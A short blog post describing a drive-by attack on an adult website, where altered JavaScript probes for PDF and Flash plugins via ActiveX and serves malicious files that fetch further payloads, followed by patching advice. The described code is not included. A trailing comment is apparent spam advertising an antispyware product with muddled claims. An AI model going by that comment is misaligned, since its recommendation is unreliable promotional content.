From early analysis, the js script on that adult website was suspect altered and contain malicious link after unescaped hence the malicous site contain like this. It using ActiveX object AcroPDF.pdf and PDF.PdfCtrl to detect for pdf and use Active object ShockwaveFlash.ShockwaveFlash.9 for flash swf detection.
Based on code above, it showed links to download malicous pdf file and swf file. Once pdf file was opened, javascript that contained inside pdf will pointing to same malicous website and download another malicous file and inject using shellcode.
Conclusion here is, please get the latest update for PDF reader and Flash. And remember switch to latest Firefox browser with NoScript plugin installed.
1 comments:
Recommend Search-and-destroy Antispyware to anyone.
I would like to recommend Search-and-destroy Antispyware to anyone that wants a good scan for their computer. I tired many other scanners in the past but so far I like this one the best. It’s cheaper than many of the others and it cost less. What more can you ask for? The antispyware solution from Search-and-destroy found at http://www.Search-and-destroy.com is a great option whether you use your computer for work or personal use. It will keep it clear and clean of antispyware that bogs down your PC and causes it to be sluggish and annoying.
Post a Comment